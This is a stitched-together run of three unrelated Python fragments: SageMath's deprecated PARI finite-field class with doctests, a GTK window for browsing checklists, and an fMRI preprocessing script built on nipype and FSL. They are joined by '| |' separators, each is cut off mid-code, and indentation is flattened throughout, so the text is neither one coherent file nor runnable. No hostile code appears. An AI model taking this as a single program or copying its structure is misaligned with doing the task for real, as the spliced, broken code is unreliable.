Fields can be coerced into sets or list and iterated over::
sage: list(k)
[0, 1, 2, a, a + 1, a + 2, 2*a, 2*a + 1, 2*a + 2]
The following is a native Python set::
sage: set(k)
{0, 1, 2, a, 2*a, a + 1, 2*a + 1, a + 2, 2*a + 2}
And the following is a Sage set::
sage: Set(k)
{0, 1, 2, a, a + 1, a + 2, 2*a, 2*a + 1, 2*a + 2}
We can also make a list via comprehension:
sage: [x for x in k]
[0, 1, 2, a, a + 1, a + 2, 2*a, 2*a + 1, 2*a + 2]
Next we compute with the finite field of order 16, where
the name is named ``b``::
sage: P.<x> = PolynomialRing(GF(2))
sage: from sage.rings.finite_rings.finite_field_ext_pari import FiniteField_ext_pari
sage: k16 = FiniteField_ext_pari(16, "b", modulus=(x^4 + x + 1))
sage: z = k16.gen()
sage: z
b
sage: z.charpoly('x')
x^4 + x + 1
sage: k16.is_field()
True
sage: k16.characteristic()
2
sage: z.multiplicative_order()
15
Of course one can also make prime finite fields::
sage: k = FiniteField(7)
Note that the generator is 1::
sage: k.gen()
1
sage: k.gen().multiplicative_order()
1
Prime finite fields are implemented elsewhere, they cannot be
constructed using :class:`FiniteField_ext_pari`::
sage: k = FiniteField_ext_pari(7, 'a', modulus=polygen(GF(7)))
Traceback (most recent call last):
...
ValueError: The size of the finite field must not be prime.
Illustration of dumping and loading::
sage: K = FiniteField(7)
sage: loads(K.dumps()) == K
True
sage: K = FiniteField(7^10, 'b', impl='pari_mod')
doctest:...: DeprecationWarning: The "pari_mod" finite field implementation is deprecated
See http://trac.sagemath.org/17297 for details.
sage: loads(K.dumps()) == K
True
sage: K = FiniteField(7^10, 'a', impl='pari_mod')
sage: loads(K.dumps()) == K
True
In this example `K` is large enough that Conway polynomials are not
used. Note that when the field is dumped the defining polynomial `f`
is also dumped. Since `f` is determined by a random algorithm, it's
important that `f` is dumped as part of `K`. If you quit Sage and
restart and remake a finite field of the same order (and the order is
large enough so that there is no Conway polynomial), then defining
polynomial is probably different. However, if you load a previously
saved field, that will have the same defining polynomial. ::
sage: K = GF(10007^10, 'a', impl='pari_mod')
sage: loads(K.dumps()) == K
True
.. NOTE::
We do NOT yet define natural consistent inclusion maps
between different finite fields.
"""
def __init__(self, q, name, modulus=None):
"""
Create finite field of order `q` with variable printed as name.
EXAMPLES::
sage: k = FiniteField(9, 'a', impl='pari_mod'); k
Finite Field in a of size 3^2
"""
from sage.misc.superseded import deprecation
deprecation(17297, 'The "pari_mod" finite field implementation is deprecated')
if element_ext_pari.dynamic_FiniteField_ext_pariElement is None: element_ext_pari._late_import()
from finite_field_constructor import FiniteField as GF
q = integer.Integer(q)
if q < 2:
raise ArithmeticError("q must be a prime power")
# note: the following call takes care of the fact that
# proof.arithmetic() is True or False.
p, n = q.is_prime_power(get_data=True)
if n > 1:
base_ring = GF(p)
elif n == 0:
raise ArithmeticError("q must be a prime power")
else:
raise ValueError("The size of the finite field must not be prime.")
FiniteField_generic.__init__(self, base_ring, name, normalize=True)
self._kwargs = {}
self.__char = p
self.__pari_one = pari.pari(1).Mod(self.__char)
self.__degree = n
self.__order = q
self.__is_field = True
if not sage.rings.polynomial.polynomial_element.is_Polynomial(modulus):
from sage.misc.superseded import deprecation
deprecation(16930, "constructing a FiniteField_ext_pari without giving a polynomial as modulus is deprecated, use the more general FiniteField constructor instead")
if modulus is None or modulus == "default":
from conway_polynomials import exists_conway_polynomial
if exists_conway_polynomial(self.__char, self.__degree):
modulus = "conway"
else:
modulus = "random"
if isinstance(modulus,str):
if modulus == "conway":
from conway_polynomials import conway_polynomial
modulus = conway_polynomial(self.__char, self.__degree)
elif modulus == "random":
# The following is fast/deterministic, but has serious problems since
# it crashes on 64-bit machines, and I can't figure out why:
# self.__pari_modulus = pari.pari.finitefield_init(self.__char, self.__degree, self.variable_name())
# So instead we iterate through random polys until we find an irreducible one.
R = GF(self.__char)['x']
while True:
modulus = R.random_element(self.__degree)
modulus = modulus.monic()
if modulus.degree() == self.__degree and modulus.is_irreducible():
break
else:
raise ValueError("Modulus parameter not understood")
elif isinstance(modulus, (list, tuple)):
modulus = GF(self.__char)['x'](modulus)
elif sage.rings.polynomial.polynomial_element.is_Polynomial(modulus):
if modulus.base_ring() is not base_ring:
modulus = modulus.change_ring(base_ring)
else:
raise ValueError("Modulus parameter not understood")
self._modulus = modulus
f = pari.pari(str(modulus))
self.__pari_modulus = f.subst(modulus.parent().variable_name(), 'a') * self.__pari_one
self.__gen = element_ext_pari.FiniteField_ext_pariElement(self, pari.pari('a'))
self._zero_element = self._element_constructor_(0)
self._one_element = self._element_constructor_(1)
def __reduce__(self):
"""
For pickling.
EXAMPLES::
sage: k.<b> = GF(5^20, impl='pari_mod'); type(k)
<class 'sage.rings.finite_rings.finite_field_ext_pari.FiniteField_ext_pari_with_category'>
sage: k is loads(dumps(k))
True
"""
return self._factory_data[0].reduce_data(self)
def _pari_one(self):
r"""
The PARI object ``Mod(1,p)``. This is implementation specific
and should be ignored by users.
EXAMPLES::
sage: k = GF(7^20, 'a', impl='pari_mod')
sage: k._pari_one()
Mod(1, 7)
"""
return self.__pari_one
def _pari_modulus(self):
"""
The polynomial mod `p` that defines the finite field, as a PARI
object. This is implementation specific, and some finite fields
might not be implemented using PARI, so you should avoid using
this function.
OUTPUT:
- ``gen`` -- a PARI polynomial gen
EXAMPLES::
sage: FiniteField(19^2, 'a', impl='pari_mod')._pari_modulus()
Mod(1, 19)*a^2 + Mod(18, 19)*a + Mod(2, 19)
sage: FiniteField(13^3, 'a', impl='pari_mod')._pari_modulus()
Mod(1, 13)*a^3 + Mod(2, 13)*a + Mod(11, 13)
Note that the PARI modulus is always in terms of a, even if
the field variable isn't. This is because the specific choice
of variable name has meaning in PARI, i.e., it can't be
arbitrary. ::
sage: FiniteField(2^4, "b", impl='pari_mod')._pari_modulus()
Mod(1, 2)*a^4 + Mod(1, 2)*a + Mod(1, 2)
"""
return self.__pari_modulus
def gen(self, n=0):
"""
Return a generator of ``self`` over its prime field, which is a
root of ``self.modulus()``.
INPUT:
- ``n`` -- must be 0
OUTPUT:
An element `a` of ``self`` such that ``self.modulus()(a) == 0``.
.. WARNING::
This generator is not guaranteed to be a generator for the
multiplicative group. To obtain the latter, use
:meth:`~sage.rings.finite_rings.finite_field_base.FiniteFields.multiplicative_generator()`
or use the ``modulus="primitive"`` option when constructing
the field.
EXAMPLES::
sage: FiniteField(2^4, "b", impl='pari_mod').gen()
b
sage: k = FiniteField(3^4, "alpha", impl='pari_mod')
sage: a = k.gen()
sage: a
alpha
sage: a^4
alpha^3 + 1
"""
if n:
raise IndexError("only one generator")
return self.__gen
def characteristic(self):
"""
Returns the characteristic of the finite field, which is a
prime number.
EXAMPLES::
sage: k = FiniteField(3^4, 'a', impl='pari_mod')
sage: k.characteristic()
3
"""
return self.__char
def degree(self):
"""
Returns | |
import sys
import os
import copy
import collections
try:
Counter=collections.Counter
pass
except AttributeError:
# python 2.6 and earlier don't have collections.Counter.
# Use local version py26counter.py instead
import py26counter
Counter=py26counter.Counter
pass
import numpy as np
if "gi" in sys.modules: # gtk3
import gi
gi.require_version('Gtk','3.0')
from gi.repository import Gtk as gtk
from gi.repository import GObject as gobject
pass
else :
# gtk2
import gtk
import gobject
pass
from . import dc_value
from . import paramdb2 as pdb
from . import checklistdb
__pychecker__="no-argsused no-import"
###***!!! Should modify to request notifications from checklistdb!!!***
###*** Should modify to be able to show only certain checklists (e.g. open ones) http://faq.pygtk.org/index.py?req=show&file=faq13.048.htp
def attemptuniqify(entry,instructions):
# apply abbreviation instructions to entry
# instructions are a list of tuples.
# each tuple is (num of chars, True to copy chars or False to replace them with "...")
entrypos=0
instrpos=0
entryresolved=""
while entrypos < len(entry):
if instrpos >= len(instructions):
entryresolved+=entry[entrypos:]
entrypos+=len(entry)-entrypos
continue
#sys.stderr.write("er=%s instr=%s\n" % (entryresolved,str(instructions[instrpos])))
if instructions[instrpos][1] or instructions[instrpos][0] < 4: # copy chars if we are told to or if the number to hide is less than 4
entryresolved+=entry[entrypos:(entrypos+instructions[instrpos][0])]
pass
else:
entryresolved+="..."
pass
entrypos+=instructions[instrpos][0]
instrpos+=1
pass
#sys.stderr.write("entryresolved=%s\n\n" % (entryresolved))
return entryresolved
def resolveuniqifyconflict(conflictlist):
# idxaccumulator=collections.Counter()
maxlen=0
for entry in conflictlist:
if len(entry) > maxlen:
maxlen=len(entry)
pass
pass
nparray=np.zeros((len(conflictlist),maxlen),dtype='U') # create character-by-character array
for cnt in range(len(conflictlist)):
nparray[cnt,:len(conflictlist[cnt])]=tuple(conflictlist[cnt])
pass
numunique=np.zeros(maxlen,np.uint32)
for col in range(maxlen):
numunique[col]=len(np.unique(nparray[:,col]))
pass
# translate into string where 's' means one single value for entire column, 'm' means multiple values
uniquemap=''.join([ 's' if entry==1 else 'm' for entry in numunique])
uniquesplit=uniquemap.split('m')
instructions=[] # each instructions entry is tuple: (numchars,True) to copy the characters, (numchars,False) to replace them by "..."
for cnt in range(len(uniquesplit)):
entry=uniquesplit[cnt]
if len(entry) > 3:
instructions.append((len(entry),False))
elif len(entry) > 0 :
instructions.append((len(entry),True))
pass
if cnt != len(uniquesplit)-1:
instructions.append((1,True)) # copy the multiple-valued character (separator from the split)
pass
pass
# join duplicate instructions
pos=0
while pos < len(instructions)-1:
if instructions[pos][1] and instructions[pos+1][1]:
instructions[pos]=(instructions[pos][0]+instructions[pos+1][0],True)
del instructions[pos+1]
pass
else:
pos+=1
pass
pass
resolvedlist=[]
for entry in conflictlist:
entryresolved=attemptuniqify(entry,instructions)
resolvedlist.append(entryresolved)
pass
return (resolvedlist,instructions)
def uniqify(listofstrings):
# given a list of strings, insert ellipsis as possible to keep different strings different
# get unique strings
stringset=set(listofstrings)
# Create a reverse mapping of abbreviations to strings
reversemap={}
for entry in stringset:
if len(entry) < 7:
reversemap[entry]=entry
pass
else:
abbreviated=entry[0:3]+"..."
if abbreviated in reversemap:
if isinstance(reversemap[abbreviated],tuple):
# if it's a tuple then it points at our previous attempts to resolve
(conflictlist,resolvedlist,instructions)=reversemap[abbreviated]
conflictlist.append(entry)
#import pdb as pythondb
#try:
# re-resolve
entryresolved=attemptuniqify(entry,instructions)
#except:
# pythondb.post_mortem()
if entryresolved in reversemap:
# previous method failed
# remove current resolution
for cnt in range(len(resolvedlist)):
del reversemap[resolvedlist[cnt]]
pass
# develop new resolution
(resolvedlist,instructions)=resolveuniqifyconflict(conflictlist)
# apply new resolution
for cnt in range(len(conflictlist)):
reversemap[resolvedlist[cnt]]=conflictlist[cnt]
pass
reversemap[abbreviated]=(conflictlist,resolvedlist,instructions)
pass
else:
resolvedlist.append(entryresolved)
reversemap[entryresolved]=entry
pass
pass
else :
conflictlist=[entry,reversemap[abbreviated]]
(resolvedlist,instructions)=resolveuniqifyconflict(conflictlist)
reversemap[abbreviated]=(conflictlist,resolvedlist,instructions)
# apply
for cnt in range(len(conflictlist)):
reversemap[resolvedlist[cnt]]=conflictlist[cnt]
pass
pass
pass
else :
# this prefix is not present... insert it
reversemap[abbreviated]=entry
pass
pass
pass
# Remove record of previous resolve attempts
for abbreviated in reversemap.keys():
if isinstance(reversemap[abbreviated],tuple):
del reversemap[abbreviated]
pass
pass
# Create forward mapping
forwardmap = dict((reversemap[abbrev],abbrev) for abbrev in reversemap)
return [forwardmap[s] for s in listofstrings]
# doabbrev is no longer used
def doabbrev(listofobjs,objattr,objabbrevattr,separator="_"):
# go through listofobjs and place abbreviations for attribute objattr in attribute objabrrevattr
# split according to underscores
# find maximum length
listofstrings=[ getattr(obj,objattr) if getattr(obj,objattr) is not None else "None" for obj in listofobjs ]
#import pdb as pythondb
#try:
splitstrings=[ s.split(separator) for s in listofstrings ]
#except:
# pythondb.post_mortem()
splitabbrevstrings=copy.copy(splitstrings)
# Create abbreviated strings for each substring
maxcols=0
for cnt in range(len(splitstrings)):
if len(splitstrings[cnt]) > maxcols:
maxcols=len(splitstrings[cnt])
pass
pass
for cnt in range(maxcols):
fulllist=[ line[cnt] if cnt < len(line) else None for line in splitabbrevstrings ]
fulllistshort=[ fulllistentry for fulllistentry in fulllist if fulllistentry is not None]
abbrevlistshort=uniqify(fulllistshort)
shortcnt=0
abbrevlist=[]
for longcnt in range(len(fulllist)):
if fulllist[longcnt] is None:
abbrevlist.append(None)
pass
else:
abbrevlist.append(abbrevlistshort[shortcnt])
shortcnt+=1
pass
pass
assert(shortcnt==len(abbrevlistshort))
for cnt2 in range(len(splitstrings)):
if abbrevlist[cnt2] is not None:
splitabbrevstrings[cnt2][cnt]=abbrevlist[cnt2]
pass
pass
pass
common=[]
mergecount=1
while mergecount > 0:
mergecount=0
# find most common combinations of words
accumulator=Counter()
for entry in splitstrings:
for pos in range(len(entry)-1):
accumulator[separator.join(entry[pos:(pos+2)])]+=1
pass
mc=accumulator.most_common()
for cnt in range(len(mc)):
(num,strng)=mc[cnt]
if num < len(listofstrings)/10: # we don't try to join things repeated less than 10% of the time
break
# merge this string
for cnt2 in range(len(splitstrings)):
entry=splitstrings[cnt2]
abbreventry=splitabbrevstrings[cnt2]
for pos in range(len(abbreventry)-1):
if strng==separator.join(entry[pos:(pos+2)]):
mergecount+=1
common.append(strng)
entry[pos]=strng
del entry[pos+1]
# merge abbreviated entry for these strings too
abbreventry[pos]=strng
del abbreventry[pos+1]
break
pass
pass
pass
pass
# Uniqify common substrings
commonuniqueabbrev=uniqify(common)
# make quick lookup for common substrings
commonabbrevdict=dict( (common[cnt],commonuniqueabbrev[cnt]) for cnt in range(len(common)))
# search out these common substrings and replace them
for line in splitabbrevstrings:
for col in range(len(line)):
if line[col] in commonabbrevdict:
line[col]=commonabbrevdict[line[col]]
pass
pass
pass
# Merge everything back together and save in attribute
for cnt in range(len(splitabbrevstrings)):
setattr(listofobjs[cnt],objabbrevattr,separator.join(splitabbrevstrings[cnt]))
pass
return
def timestamp_abbreviate(isotimestamp):
(date,time)=isotimestamp.split("T")
(year,month,day)=date.split("-")
timesplit=time.split(":")
hour=timesplit[0]
minute=timesplit[1]
return "%s-%sT%s:%s" % (month,day,hour,minute)
class checklistdbwin(gtk.Window):
contexthref=None
paramdb=None
clparamname=None
clparamname2=None
popupcallback=None
popupcallbackargs=None
allchecklists=None
allplans=None
liststorerows=None # count of rows in the liststore
liststore=None # the gtk.ListStore that mirrors the paramdb database
treeview=None # TreeView that displays the ListStore
checklists=None # list of class checklistdb.checklistentry
checklistsbyabsurl=None # Dictionary of checklists, indexed by entry.filehref.absurl()
scrolled=None # gtk.ScrolledWindow object
viewport=None # vtk.Viewport object
# Must match titles and types, in __init__ (below), and bottom of liststoreupdate() (below)... also be sure to update query_tooltip() and see also doabbrev() calls.
COLUMN_ORIGHREF=0
#COLUMN_CLINFO=1
#COLUMN_CLTYPE=2
COLUMN_FILENAME=1
COLUMN_MEASNUM=2
COLUMN_STARTTIMESTAMP=3
COLUMN_IS_OPEN=4
COLUMN_ALLCHECKED=5
COLUMN_IS_DONE=6
COLUMN_EXTRA_HREF=7 # hidden
COLUMN_EXTRA_SHOWTHISROW=8 # hidden, flag for whether this row should be shown or filtered (not yet implemented)
def __init__(self,contexthref,paramdb,clparamname,clparamname2=None,popupcallback=None,popupcallbackargs=[],allchecklists=False,allplans=False):
gobject.GObject.__init__(self)
self.contexthref=contexthref
self.paramdb=paramdb
self.clparamname=clparamname
self.clparamname2=clparamname2
#self.explogwin=explogwin
self.popupcallback=popupcallback
self.popupcallbackargs=popupcallbackargs
self.allchecklists=allchecklists
self.allplans=allplans
self.checklists=[]
self.liststorerows=0
if clparamname2 is not None:
self.set_title("datacollect2 %s/%s" % (clparamname,clparamname2))
pass
else:
self.set_title("datacollect2 %s" % (clparamname))
pass
titles=["Orig Name","Filename","Measnum","Start Timestamp","Open","All Checked","Done"]
types=[gobject.TYPE_STRING,gobject.TYPE_STRING,gobject.TYPE_LONG,gobject.TYPE_STRING,gobject.TYPE_BOOLEAN,gobject.TYPE_BOOLEAN,gobject.TYPE_BOOLEAN,gobject.TYPE_STRING,gobject.TYPE_BOOLEAN]
self.liststore=gtk.ListStore(*types)
self.set_property("default-width",1100)
self.set_property("default-height",350)
self.liststoreupdate()
self.treeview=gtk.TreeView(self.liststore)
# Create columns
for colnum in range(len(titles)):
renderer=gtk.CellRendererText()
# print "column: %s" % (titles[tagnum])
# if colnum==self.COLUMN_VALUE: # Value column
# renderer.set_property('editable', True)
# renderer.connect('edited',self.cell_edited_callback)
# pass
column=gtk.TreeViewColumn(titles[colnum],renderer,text=colnum) #,background=self.COLUMN_BGCOLOR) # background=self.COLUMN_BGCOLOR sets column number to extract background colorcursop
column.set_resizable(True)
column.set_max_width(300)
column.set_sort_column_id(colnum)
self.treeview.append_column(column)
pass
self.scrolled=gtk.ScrolledWindow()
# gtk3 defines Gtk.PolicyType
if hasattr(gtk,"PolicyType") and hasattr(gtk.PolicyType,"AUTOMATIC"):
self.scrolled.set_policy(gtk.PolicyType.AUTOMATIC,gtk.PolicyType.ALWAYS)
pass
else :
self.scrolled.set_policy(gtk.POLICY_AUTOMATIC,gtk.POLICY_ALWAYS)
pass
self.viewport=gtk.Viewport()
if self.treeview is not None:
self.viewport.add(self.treeview)
pass
self.scrolled.add(self.viewport)
self.add(self.scrolled)
self.connect("delete-event",self.closehandler)
self.treeview.connect("row-activated",self.rowactivate)
# set up tooltips
self.treeview.set_property('has-tooltip',True)
self.treeview.connect("query-tooltip",self.query_tooltip)
self.show_all()
checklistdb.requestopennotify(self.liststoreupdate)
checklistdb.requestfilenamenotify(self.liststoreupdate)
checklistdb.requestresetnotify(self.liststoreupdate)
checklistdb.requestdonenotify(self.liststoreupdate)
checklistdb.requestclosenotify(self.liststoreupdate)
pass
def query_tooltip(self,widget,x,y,keyboard_mode,tooltip):
#sys.stderr.write("query_tooltip\n")
# reference: http://www.gtkforums.com/viewtopic.php?t=2590
# reference: https://developer.gnome.org/gtk3/stable/GtkTooltip.html#GtkTooltip.description
# reference: Evolution's mail-component.c query_tooltip_cb() function
context=self.treeview.get_tooltip_context(x,y,keyboard_mode)
if not context:
return False
else:
if len(context)==3: # pygtk2
(model,path,tviter)=context
pass
else:
model=context.model
path=context.path
tviter=context.iter
pass
#sys.stderr.write("query_tooltip got context\n")
# Determine column
if keyboard_mode:
cursor=self.treeview.get_cursor()
if cursor is None:
return False
(pathjunk,column)=cursor
pass
elif model is not None:
#sys.stderr.write("query_tooltip mouse mode x=%d, y=%d\n" % (x,y))
path_at_pos=self.treeview.get_path_at_pos(x,y)
if path_at_pos is None:
return False
(pathjunk,column,relx,rely)=path_at_pos
#sys.stderr.write("query_tooltip got path\n")
self.treeview.set_tooltip_cell(tooltip,path,column,None)
# convert column (gtk.TreeViewColumn object) to columnum
# This is a hack... there must be a better way.
columnnum=column.get_sort_column_id() # since we set this property to match up with colnum when we created the TreeViewColumns.
#model.get(tviter,column)
href_absurl=model.get_value(tviter,self.COLUMN_EXTRA_HREF)
checklistentry=None
if href_absurl in self.checklistsbyabsurl:
checklistentry=self.checklistsbyabsurl[href_absurl]
pass
#sys.stderr.write("query_tooltip got href %s\n" % (href))
## find checklistentry
#checklistentry=None
#for entry in self.checklists:
# if entry.filehref==href:
# checklistentry=entry
# break
# pass
if checklistentry is None:
return False # no checklist found
# only need columns that are abbreviated here...
if columnnum==self.COLUMN_ORIGHREF:
text=checklistentry.orighref.absurl()
pass
#elif columnnum==self.COLUMN_CLINFO:
# text=checklistentry.clinfo
# pass
elif columnnum==self.COLUMN_FILENAME:
text=checklistentry.filehref.absurl()
pass
elif columnnum==self.COLUMN_MEASNUM:
if checklistentry.measnum is not None:
text=str(checklistentry.measnum)
pass
else:
text=""
pass
pass
elif columnnum==self.COLUMN_STARTTIMESTAMP:
text=checklistentry.starttimestamp
pass
else :
#sys.stderr.write("Unknown column: %s\n" | |
from __future__ import division
from os.path import join, basename, exists
from os import makedirs
from nilearn import input_data, datasets, plotting, regions
from nilearn.image import concat_imgs
from nilearn.input_data import NiftiLabelsMasker
from nilearn.connectome import ConnectivityMeasure
from scipy.stats import pearsonr
import nipype.pipeline.engine as pe
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from nipype.interfaces.fsl import InvWarp, ApplyWarp
import bct
import json
import numpy as np
import pandas as pd
import datetime
# ## Preprocessing
# Largely following the Westphal et al. (2017) paper, but taking into account the things that <NAME> does in her papers (which I still need to look into).
# ### Preprocessing methods per Westphal et al., 2017
# 1. Slice timing correction
# 2. Motion correction
# 3. Unwarping
# 4. Coregistration to subject's T1
# 5. Anatomical segmentation
# 6. Spatial normalization to MNI template
# 7. Spatial smoothing (6mm FWHM)
# 8. High-pass filtering (236_s_)
# 9. Timecourse per voxel demeaned.
# ### Alterations made below
# Preprocessing was done with FSL tools in Nipype.
# 3. No fieldmaps, so no unwarping... (look into this)
# 7. No smoothing
# 8. High pass filtering at 55s
# 9. Standardized TS
# In[1]:
def preproc(
data_dir, sink_dir, subject, task, session, run, masks, motion_thresh, moco
):
from nipype.interfaces.fsl import (
MCFLIRT,
FLIRT,
FNIRT,
ExtractROI,
ApplyWarp,
MotionOutliers,
InvWarp,
FAST,
)
# from nipype.interfaces.afni import AlignEpiAnatPy
from nipype.interfaces.utility import Function
from nilearn.plotting import plot_anat
from nilearn import input_data
# WRITE A DARA GRABBER
def get_niftis(subject_id, data_dir, task, run, session):
from os.path import join, exists
t1 = join(
data_dir,
subject_id,
"session-{0}".format(session),
"anatomical",
"anatomical-0",
"anatomical.nii.gz",
)
# t1_brain_mask = join(data_dir, subject_id, 'session-1', 'anatomical', 'anatomical-0', 'fsl', 'anatomical-bet.nii.gz')
epi = join(
data_dir,
subject_id,
"session-{0}".format(session),
task,
"{0}-{1}".format(task, run),
"{0}.nii.gz".format(task),
)
assert exists(t1), "t1 does not exist at {0}".format(t1)
assert exists(epi), "epi does not exist at {0}".format(epi)
standard = "/home/applications/fsl/5.0.8/data/standard/MNI152_T1_2mm.nii.gz"
return t1, epi, standard
data = Function(
function=get_niftis,
input_names=["subject_id", "data_dir", "task", "run", "session"],
output_names=["t1", "epi", "standard"],
)
data.inputs.data_dir = data_dir
data.inputs.subject_id = subject
data.inputs.run = run
data.inputs.session = session
data.inputs.task = task
grabber = data.run()
if session == 0:
sesh = "pre"
if session == 1:
sesh = "post"
# reg_dir = '/home/data/nbc/physics-learning/data/first-level/{0}/session-1/retr/retr-{1}/retr-5mm.feat/reg'.format(subject, run)
# set output paths for quality assurance pngs
qa1 = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_t1_flirt.png".format(subject, session, task, run),
)
qa2 = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_mni_flirt.png".format(subject, session, task, run),
)
qa3 = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_mni_fnirt.png".format(subject, session, task, run),
)
confound_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_confounds.txt".format(subject, session, task, run),
)
# run motion correction if indicated
if moco == True:
mcflirt = MCFLIRT(ref_vol=144, save_plots=True, output_type="NIFTI_GZ")
mcflirt.inputs.in_file = grabber.outputs.epi
# mcflirt.inputs.in_file = join(data_dir, subject, 'session-1', 'retr', 'retr-{0}'.format(run), 'retr.nii.gz')
mcflirt.inputs.out_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mcf.nii.gz".format(subject, session, task, run),
)
flirty = mcflirt.run()
motion = np.genfromtxt(flirty.outputs.par_file)
else:
print "no moco needed"
motion = 0
# calculate motion outliers
try:
mout = MotionOutliers(metric="fd", threshold=motion_thresh)
mout.inputs.in_file = grabber.outputs.epi
mout.inputs.out_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_fd-gt-{3}mm".format(
subject, session, task, run, motion_thresh
),
)
mout.inputs.out_metric_plot = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_metrics.png".format(subject, session, task, run),
)
mout.inputs.out_metric_values = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_fd.txt".format(subject, session, task, run),
)
moutliers = mout.run()
outliers = np.genfromtxt(moutliers.outputs.out_file)
e = "no errors in motion outliers, yay"
except Exception as e:
print (e)
outliers = np.genfromtxt(mout.inputs.out_metric_values)
# set everything above the threshold to 1 and everything below to 0
outliers[outliers > motion_thresh] = 1
outliers[outliers < motion_thresh] = 0
# concatenate motion parameters and motion outliers to form confounds file
# outliers = outliers.reshape((outliers.shape[0],1))
conf = outliers
np.savetxt(confound_file, conf, delimiter=",")
# extract an example volume for normalization
ex_fun = ExtractROI(t_min=144, t_size=1)
ex_fun.inputs.in_file = flirty.outputs.out_file
ex_fun.inputs.roi_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}-example_func.nii.gz".format(
subject, session, task, run
),
)
fun = ex_fun.run()
warp = ApplyWarp(interp="nn", abswarp=True)
if not exists(
"/home/data/nbc/physics-learning/data/first-level/{0}/session-{1}/{2}/{2}-{3}/{2}-5mm.feat/reg/example_func2standard_warp.nii.gz".format(
subject, session, task, run
)
):
# two-step normalization using flirt and fnirt, outputting qa pix
flit = FLIRT(cost_func="corratio", dof=12)
reg_func = flit.run(
reference=fun.outputs.roi_file,
in_file=grabber.outputs.t1,
searchr_x=[-180, 180],
searchr_y=[-180, 180],
out_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_t1-flirt.nii.gz".format(
subject, session, task, run
),
),
out_matrix_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_t1-flirt.mat".format(
subject, session, task, run
),
),
)
reg_mni = flit.run(
reference=grabber.outputs.t1,
in_file=grabber.outputs.standard,
searchr_y=[-180, 180],
searchr_z=[-180, 180],
out_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-flirt-t1.nii.gz".format(
subject, session, task, run
),
),
out_matrix_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-flirt-t1.mat".format(
subject, session, task, run
),
),
)
# plot_stat_map(aligner.outputs.out_file, bg_img=fun.outputs.roi_file, colorbar=True, draw_cross=False, threshold=1000, output_file=qa1a, dim=-2)
display = plot_anat(fun.outputs.roi_file, dim=-1)
display.add_edges(reg_func.outputs.out_file)
display.savefig(qa1, dpi=300)
display.close()
display = plot_anat(grabber.outputs.t1, dim=-1)
display.add_edges(reg_mni.outputs.out_file)
display.savefig(qa2, dpi=300)
display.close()
perf = FNIRT(output_type="NIFTI_GZ")
perf.inputs.warped_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1.nii.gz".format(
subject, session, task, run
),
)
perf.inputs.affine_file = reg_mni.outputs.out_matrix_file
perf.inputs.in_file = grabber.outputs.standard
perf.inputs.subsampling_scheme = [8, 4, 2, 2]
perf.inputs.fieldcoeff_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1-warpcoeff.nii.gz".format(
subject, session, task, run
),
)
perf.inputs.field_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1-warp.nii.gz".format(
subject, session, task, run
),
)
perf.inputs.ref_file = grabber.outputs.t1
reg2 = perf.run()
warp.inputs.field_file = reg2.outputs.field_file
# plot fnirted MNI overlaid on example func
display = plot_anat(grabber.outputs.t1, dim=-1)
display.add_edges(reg2.outputs.warped_file)
display.savefig(qa3, dpi=300)
display.close()
else:
warpspeed = InvWarp(output_type="NIFTI_GZ")
warpspeed.inputs.warp = "/home/data/nbc/physics-learning/data/first-level/{0}/session-{1}/{2}/{2}-{3}/{2}-5mm.feat/reg/example_func2standard_warp.nii.gz".format(
subject, session, task, run
)
warpspeed.inputs.reference = fun.outputs.roi_file
warpspeed.inputs.inverse_warp = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1-warp.nii.gz".format(
subject, session, task, run
),
)
mni2epiwarp = warpspeed.run()
warp.inputs.field_file = mni2epiwarp.outputs.inverse_warp
for key in masks.keys():
# warp takes us from mni to epi
warp.inputs.in_file = masks[key]
warp.inputs.ref_file = fun.outputs.roi_file
warp.inputs.out_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_{4}.nii.gz".format(
subject, session, task, run, key
),
)
net_warp = warp.run()
qa_file = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_qa_{4}.png".format(
subject, session, task, run, key
),
)
display = plotting.plot_roi(
net_warp.outputs.out_file,
bg_img=fun.outputs.roi_file,
colorbar=True,
vmin=0,
vmax=18,
draw_cross=False,
)
display.savefig(qa_file, dpi=300)
display.close()
return flirty.outputs.out_file, confound_file, e
# choose your atlas and either fetch it from Nilearn using one of the the 'datasets' functions
shen = "/home/kbott006/physics-retrieval/shen2015_2mm_268_parcellation.nii.gz"
craddock = "/home/kbott006/physics-retrieval/craddock2012_tcorr05_2level_270_2mm.nii.gz"
masks = {"shen2015": shen, "craddock2012": craddock}
# In[ ]:
# only want post subjects
subjects = [
"101",
"102",
"103",
"104",
"106",
"107",
"108",
"110",
"212",
"214",
"215",
"216",
"217",
"218",
"219",
"320",
"321",
"323",
"324",
"325",
"327",
"328",
"330",
"331",
"333",
"334",
"335",
"336",
"337",
"338",
"339",
"340",
"341",
"342",
"343",
"344",
"345",
"346",
"347",
"348",
"349",
"350",
"451",
"453",
"455",
"458",
"459",
"460",
"462",
"463",
"464",
"465",
"467",
"468",
"469",
"470",
"502",
"503",
"571",
"572",
"573",
"574",
"577",
"578",
"581",
"582",
"584",
"585",
"586",
"587",
"588",
"589",
"591",
"592",
"593",
"594",
"595",
"596",
"597",
"598",
